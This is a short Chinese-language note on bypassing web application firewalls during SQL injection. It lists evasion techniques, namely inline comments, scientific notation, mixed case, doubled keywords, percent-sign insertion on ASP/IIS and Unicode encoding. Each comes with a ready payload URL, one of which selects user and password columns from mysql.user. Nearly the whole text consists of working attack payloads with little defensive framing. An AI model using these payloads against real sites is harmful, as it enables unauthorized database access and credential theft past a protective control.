waf,全名web application firewall,名为web应用防火墙,其实就是市面上的狗、锁、盾、神、宝等等。。可以保护主机、监控流量等。
waf会对sql注入进行过滤,弃置等操作致使sql注入失败,但是也有很多绕过方法
1.使用注释符:
“#” “--+” “ -- -” “//“ ”/**/“等等
举例:index.php?id=15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
2.使用科学记数法:
举例:index.php?id=1e1union select urser,password from mysql.user
3.使用使用大小写:
举例:index.php?id=15 uNIoN sELecT 1,2,3,4….
4.关键字替换:
举例:index.php?id=15 UNIunionON SELselectECT 1,2,3,4….
5.内部注释:
(1)asp+iis环境中,可能会忽略%,而waf不会,所以可尝试以下方法:
id=1' union se%lect user fr%om username
(2)iis支持unicode解析,会自动转换unicode编码,但waf不会转换,所以:
id=\u0031\u0020\u0075\u006e\u0069\u006f\u006e\u0020\u0073\u0065\u006c\u0065\u0063\u0074\u0020\u0075\u0073\u0065\u0072